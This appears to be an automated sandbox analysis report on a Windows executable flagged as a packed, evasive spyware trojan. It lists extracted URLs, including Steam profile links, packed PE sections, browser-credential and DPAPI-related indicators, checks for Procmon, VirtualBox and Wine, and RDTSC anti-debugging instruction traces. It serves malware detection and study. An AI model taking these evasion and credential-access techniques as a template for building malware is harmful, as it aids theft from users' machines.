                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/i
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowe
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/

                System Summary

                Source: 4KDKJjRzm8.exe Static PE information: section name:
                Source: 4KDKJjRzm8.exe Static PE information: section name: .idata
                Source: 4KDKJjRzm8.exe Static PE information: section name:
                Source: 4KDKJjRzm8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4KDKJjRzm8.exeStatic PE information: Section: ZLIB complexity 0.9995340584150327
                Source: 4KDKJjRzm8.exeStatic PE information: Section: jwydwysy ZLIB complexity 0.9944206492335438
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_2_009B2070 CoCreateInstance,0_2_009B2070
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465375179.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465998398.0000000005C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 4KDKJjRzm8.exe ReversingLabs: Detection: 63%
                Source: 4KDKJjRzm8.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File read: C:\Users\user\Desktop\4KDKJjRzm8.exe
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Section loaded: version.dll
                Source: 4KDKJjRzm8.exe Static file information: File size 1875456 > 1048576
                Source: 4KDKJjRzm8.exe Static PE information: Raw size of jwydwysy is bigger than: 0x100000 < 0x19fe00

                Data Obfuscation

                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Unpacked PE file: 0.2.4KDKJjRzm8.exe.980000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jwydwysy:EW;pczmnouq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jwydwysy:EW;pczmnouq:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: 4KDKJjRzm8.exe Static PE information: real checksum: 0x1d1d3c should be: 0x1d73d3
                Source: 4KDKJjRzm8.exe Static PE information: section name:
                Source: 4KDKJjRzm8.exe Static PE information: section name: .idata
                Source: 4KDKJjRzm8.exe Static PE information: section name:
                Source: 4KDKJjRzm8.exe Static PE information: section name: jwydwysy
                Source: 4KDKJjRzm8.exe Static PE information: section name: pczmnouq
                Source: 4KDKJjRzm8.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_3_05C2514F push edx; retn 0005h 0_3_05C251CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_3_05C2355A push ss; retn 0005h 0_3_05C2356A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_3_05C25259 push eax; retn 0005h 0_3_05C2525A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_3_05C25271 push ss; retn 0005h 0_3_05C25272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Code function: 0_3_05C25109 push eax; retn 0005h 0_3_05C2510A
                Source: 4KDKJjRzm8.exe Static PE information: section name: entropy: 7.979083511203261
                Source: 4KDKJjRzm8.exe Static PE information: section name: jwydwysy entropy: 7.9543925612046

                Boot Survival

                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86B60 second address: B86B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86FB1 second address: B86FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86FB7 second address: B86FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8708C second address: B87092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87159 second address: B8715D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87620 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8762A second address: B87691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 xchg eax, ebx 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB3DD280BB8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 call 00007FB3DD280BC1h 0x00000026 sbb edi, 01D7E7C0h 0x0000002c pop esi 0x0000002d nop 0x0000002e pushad 0x0000002f jnl 00007FB3DD280BB8h 0x00000035 push esi 0x00000036 pop esi 0x00000037 jmp 00007FB3DD280BBCh 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 jmp 00007FB3DD280BBCh 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87691 second address: B8769B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87764 second address: B87768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87768 second address: B8778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FB3DD3D95F8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87B12 second address: B87B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8800C second address: B88013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B88831 second address: B88837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B88837 second address: B8883D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B89A17 second address: B89A21 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8918A second address: B8918E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8918E second address: B8919F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
